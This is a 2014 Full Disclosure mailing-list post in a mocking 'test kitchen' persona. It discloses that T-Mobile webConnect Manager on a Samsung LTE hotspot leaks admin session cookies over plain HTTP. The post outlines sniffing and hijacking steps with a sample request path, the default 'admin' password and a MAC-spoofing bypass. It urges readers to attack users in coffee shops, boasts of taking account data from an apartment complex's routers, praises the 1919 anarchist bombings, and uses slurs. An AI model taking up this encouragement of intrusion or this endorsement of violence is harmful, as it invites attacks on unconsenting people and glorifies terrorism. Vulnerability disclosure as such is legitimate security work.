Full Disclosure mailing list archives
T-Mobile webConnect Manager sysauth cookie leak in plain text via http request
From: Americas Testkitchen <americaztestkitchen () gmail com>
Date: Sat, 14 Jun 2014 06:50:07 -0700
########atk #1.txt ################################################################### "...and it won't be the witches who'll be burning this time" -Blackbird Raum, Witches Achtung!!! : T-Mobile webConnect Manager sysauth cookie leaked in plain text via http request. Scope: webConnect Manager is the interface used for administration of MANY T-Mobile devices, including the highly-touted Samsung LTE Mobile Hotspot Pro.(actually decent hardware, but this chef doesn't know much about bowls,whisks,spoons and pressure cookers, only spices and herbs.) webConnect Manager has been in the wild via T-mobiles crack security code-audit team and responsible for slowing down AmericasTestKitchens' interlinks via T-mobile-sponsored zombie nets....so..... Vendor Notification: None. Seriously.... ever hear of the secure flag you ninnies? "someday we will bring you down, someday this will all come crashing right down so go on, with your life. We Will Bring YOU DOWN!" -Blackbird Raum "Honey in the Hair" Timeline: 6.1.14 : found by Chef Samael 6.2.14 : (still 6.1.14 in Samaels tz) VRFY'd by Sou Chef: Nita 6.3.14 : canned POC developed by Chef Swedish, tested and used to propagate through weak routers of a large apartment complex, account data was retrieved and stored back to the devices considerable storage. 6.3.14 : test successful, ownership of test subjects returned, NSA grade wipe of testing fiasco complete. 6.4.14 Dist. Schedule: 6.3.14 : POC distributed amongst chefs @ the Frothing Bunniculitis board of ATK. 6.3.14 : This is posted to: 6.14.14:YOU ############Americas Test Kitchen: Recipe 1############################################## I) : Intro/Rant/Mission Statement How Are You Gentlemen/Women?!? Welcome to Americas Test Kitchen , where all are invited to test, post ingredients and share the most delightful aspects of cooking,BBQ, baking. We @ ATK assume the participants will be somewhat seasoned chefs and able to concoct full recipes on their own with a minimal discussion of ingredients. Recipes that can be purchased with a Vietnamese dong are encouraged and are best cooked amongst/against other chefs (nicely now...). Have a wonderful and blessed day! Welcome to the kitchen! Join our community on the behemoth Frothing Bunniculitis Board. It is set up as a user and not a group for a reason. Don't ask to become a chef. We will ask you. Or you'll own US and bake a cake of your own. ;) Nothing wrong with a cook-off amongst friends :p [code]Karma police, arrest this man he talks in maths. he's buzzing like a fridge. he's like a detuned radio. This is what you get this is what YOU get this is what you get when you mess with the... [/code] Our internets are broken. We are all owners and owned. Hats are meaningless. Anti-Sec didn't work. We will give small token gifts to the goy and keep the fine wine for perfect pairings to go with undisclosed recipes. We do NOT provide canned exploits. Only a small dataset for those with eyes to see and minds that reciprocate. We are agent and agency. We refer to the works of Godel, Escher and Bach. We refer to Richard Dawkins. We refer to the Max Headroom Incident of 1987, amongst/against many, many other ideals, perspectives and subcultures within subcultures and shadows behind shadows. We refer now to you. ./propagate Part 2.product info and review Overview: T-Mobile webConnect Manager is a program developed BY T-Mobile. The most used version is 2.04.0030.0 with over 98% of all installations currently using this version. While about 89% of users of T-Mobile webConnect Manager come from the United States, it is also popular in Indonesia and Iran. (hi intel, but you guys know this already) Ironic Re-views: The Samsung LTE Mobile HotSpot Pro's Web interface is easy to use and offers access to all of its settings. Note how the router is locked to T-Mobile and won't accept a SIM card from a different carrier until it's unlocked. "dis ting hee-ya is mai favowit" - Dong Ngo/CNET [code]peanutbutterjellyandabaseballbat[/code] *Ed. Dong, there are those of us who would love your job and all the swag you get as a part of the gig....DONG ....don't be deceived by its name as the Samsung LTE Mobile HotSpot PRO is more than just your average mobile hotspot and is, in fact, something all road warriors might want to have in their arsenal. - JC Torres, SlashGear *Ed. I couldn't have said it better. Still.... [code]peanutbutterjellyandabaseballbat[/code] Part 3: discovery date jun2 - 3 /historical greetz On these 2 days in history: June 2 1919: some great citizens and lovers of justice tried to level the playing field: https://en.wikipedia.org/wiki/1919_United_States_anarchist_bombings June 3, 1968: Andy Warhol the American artist and a major driving force in the movement known as Pop art is shot and wounded in his New York film studio, The Factory, by actress Valerie Solanas who founded the "group" called S.C.U.M. (Society for Cutting up Men). *Nita got a little too happy about this factoid methinks *full disclosure: ATK is busy and have some of us have lives so the following is nearing (but not quite) plagiarism of an identical issue on another WAP 300 years ago. This kind of shit should not be a factor nowadays.Infosuck 101. The Goods -> BAKING SCENARIO: An attacker may be able to cause the sysauth cookie to be leaked via a plaintext HTTP request. You can create a plaintext HTTP link to the The Samsung LTE Mobile HotSpot as a local application icon. If an administrator is authenticated to the site over SSL and visits the application list, the browser will issue the plaintext, non-SSL request and automatically include the admin's current session token. A network attacker shouldn't have any trouble being able to capture this value via network sniffing and perform subsequent actions on the administrator's behalf via DUCT-TAPE. *OUR WORDS: fire up your pcap of choice and grep http. use some duct tape (curl,expect,nc), I suggest you try a GET http://mobile.hotspot/www/apps/dongleweb/php/en/security/01_sim_pin.php Its hilarious and disturbing to see the whole cookie: SID & Credential both pass in plain text through a directory called "security" while on the way to visit the sim card.SERIOUSLY?!?! Session hi-jacking via cookie wasn't even a considerable hack in '99. They have been selling and using this fskn "software" on a majority of their devices for years. We have not the time,(we are rushing to market like you T-mobile) nor the money to activate another t-mobile device for yux.I highly suspect they are vuln on any device running the crap \\\\\\\ See all of you at the coffee shop! Keep a look out for those cute little red squares & know the admin page is loaded on a tab somewhere so they can monitor their data usage in real-time(IT WORKS SOMETIMES). There is plenty of time and places to wage attack on these. Fix your chit T-Mobile: this is beyond unacceptable. I want to see @ least a fskn s flag patch by Friday. There's more. FIX: DUCT TAPE!!: mac filtering COUNTER DUCT TAPE!!:mac spoof (it works fine with this too)good. ....disconnected References: a)by habit capturing the first transaction with a new device. Login, passwd creation, ruleset application (where applicable) look for really really stupid ish like this. Make note of the default passswd (admin btw) and the way the device is associated with the network (last 8 of the MEID in this case)...etc etc...3rd grade ish b) i.http://www.wireshark.org/ ii.http://www.tcpdump.org/ and libpcap iii.MTP Simulator 12.0 startpage it iv. https://github.com/opentechinstitute/commotion-router/issues/33 v.ATK. Thx everyone! Took 10x longer for us to agree what to say here than it did proving our perfect cookie recipe..u asshats are impossible. Coming Soon: Ingredients for Flatulent Butt-slut stew ./hi black powder records & drater/n1nor/ron1n (We miss the old kitchen...come back yoda) t-mobile tech support for the sexy internal conference line given to us on accident by one of the wonderful outsourced workers! Thanks himynameislindawitht-mobilecanihelpyou?/!!!!!! Any time Linda, any-time. Hi @ tabis pankweev and his father. ./fuqz @ cipher <------u talk like u r a 3 year old having an apoplectic fit (thats from Chef Samael) Go make me a pah you myopic turd. @ tmobile dev : for assisting in breaking OUR interwebs. grow up or get out -x ./h8 @ samsung for not honouring the insurance contract. missed payment by a day, lost service for 3 hours payed bill & insurance, drowned my device 3 days later and you told me to fsk off. Say hi 2 teh ghost of christmas past. literally. That was my xmas present you wankers. - sous chef Nita _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- T-Mobile webConnect Manager sysauth cookie leak in plain text via http request Americas Testkitchen (Jun 16)